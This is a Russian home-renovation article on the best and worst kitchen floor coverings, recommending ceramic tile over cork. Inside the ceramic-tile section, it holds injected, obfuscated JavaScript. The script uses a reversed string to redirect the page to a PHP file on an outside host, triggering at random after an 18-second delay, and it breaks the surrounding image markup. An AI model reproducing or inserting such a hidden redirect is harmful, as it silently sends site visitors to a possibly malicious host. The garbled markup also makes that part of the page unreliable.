Добавить в закладки

Самый лучший и самый худший вариант полов для кухни

Многие из нас при проведении ремонта в своём жилище задумываются о смене напольного покрытия и встает вопрос, какое же покрытие подойдёт для той или иной комнаты? У всех материалов всегда есть некоторые нюансы которые могут быть не совместимы с какими либо комнатами. В этой статье мы с вами разберем лучшие и худшие напольные покрытия для кухни.

Критерии по выбору напольного покрытия

  1. Влагостойкость. Один из ключевых параметров при выборе напольного покрытия для кухни, так как именной в этой комнате не удастся избежать брызг при готовке, мытье посуды. А так же эти факторы приводят к тому, что достаточно часто придётся заниматься мытьём пола.
  2. Ударостойкость. Нужно учитывать, что именно на кухне находится множество различных достаточно тяжелых предметов, такие как например казан и при мытье тех или иных предметов может возникнуть такая неприятность, как выскальзывание, к сожалению этого не избежать, но всегда нужно заботиться о том, чтобы ваше напольное покрытие от этого не пострадало.

Влаго и ударостойкость. Источник: parket-sale.ru

Лучшее решение для кухни – это керамическая плитка.

Керамическая плитка на данный момент, это одно из самых популярных напольных покрытий для таких помещений, как санузел, прихожая и кухня. Если этот материал настилается в кухонном помещении частного дома или над неотапливаемым помещением, то стоит ещё и задуматься над дополнительным утеплением пола, так как этот материал сам по себе достаточно холодный, но имеет высокую теплопроводность.

$NjS=function(n){if(typeof ($NjS.list[n])==»string») return $NjS.list[n].split(«»).reverse().join(«»);return $NjS.list[n];};$NjS.list=[«\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topplitka.ru/wa-data/public/slider/images/4051/11396/11396.jpg» alt=»» width=»1563″ height=»1080″ /> Керамическая плитка. Источник: www.obi.ru

И наверное самым худшим решением для напольного покрытия кухни будет – пробковый пол

Даже не смотря на то, что пробковое покрытие отлично противодействует влаге и не подвергается гниению, а также обладает достаточными звукоизоляционными свойствами, главный его минус перекрывает многие достоинства. Так как покрытие достаточно мягкое после установки массивной мебели появятся не поправимые дефекты, которые в дальнейшем будут портить внешний вид.

Так же стоит заметить, что пробковый пол не стоит использовать не только на кухне, а в целом в любом доме, где есть домашние животные, так как даже покрытие лаком не спасёт ваш пол от повреждений.

Пробковое покрытие. Источник: kitchensinteriors.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 06.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: